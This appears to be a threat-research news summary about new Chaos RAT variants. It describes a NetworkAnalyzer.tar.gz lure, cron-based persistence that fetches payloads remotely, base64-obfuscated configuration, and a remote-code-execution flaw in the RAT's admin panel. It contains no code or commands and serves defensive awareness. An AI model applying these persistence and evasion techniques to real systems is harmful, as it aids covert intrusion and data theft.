Acronis Threat Research Unit Finds New Chaos RAT Variants Targeting Linux, Windows

 Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of Chaos RAT, a once-legitimate open-source remote administration tool that is now actively leveraged in malicious campaigns targeting Linux and Windows systems. First observed in 2022 and initially built as a cross-platform management utility, it has increasingly drawn the interest of cybercriminals due to its flexibility, low detection footprint, and open-source accessibility.

Originally designed and distributed on GitHub as a remote management tool written in Golang, Chaos RAT has been weaponized by threat actors who are using it in stealthy, real-world attacks. The latest samples, discovered in 2025, demonstrate the tool’s ongoing evolution, with expanded compatibility, obfuscation techniques, and operational stealth. While its usage remains relatively limited compared to other malware families, its ability to bypass detection and maintain persistent access has made it a tool of choice for espionage, data exfiltration, and post-exploitation operations, including ransomware deployment.

Acronis TRU researchers have also discovered a critical vulnerability in Chaos RAT’s web-based administration panel that allows attackers to execute remote code on the server hosting the panel itself. Although this flaw doesn’t directly impact the victim machines, it highlights the insecure design practices behind the tool and could potentially allow attackers to hijack control from other operators. This vulnerability exemplifies the growing risks of open-source software in cybercrime supply chains.

In this latest sample spotted on Virus Total and submitted from India, a tar.gz-compressed archived file named NetworkAnalyzer.tar.gz contained the final Chaos RAT payload. There’s no additional information on how the victim received this package, but available information points to a lure attempting to convince them to download a network troubleshooting utility for Linux environments.

This typically reaches victims via phishing emails or compromised websites, with early campaigns deploying malicious scripts that modified files, a common persistence mechanism in Unix-like systems. By embedding a cron job that fetches payloads remotely, attackers ensure they can update the malware without re-infecting the host system. This approach was notably used in earlier attacks to deliver cryptocurrency miners in parallel with the latest threat, indicating reconnaissance or foothold establishment as the malware’s primary purpose.

Notably, older Chaos RAT versions stored configuration data such as IP addresses and ports in plain text, whereas the newer variant encapsulates all data in a single base64-encoded string with an additional decoding function, a clear attempt to hinder reverse engineering and forensic analysis.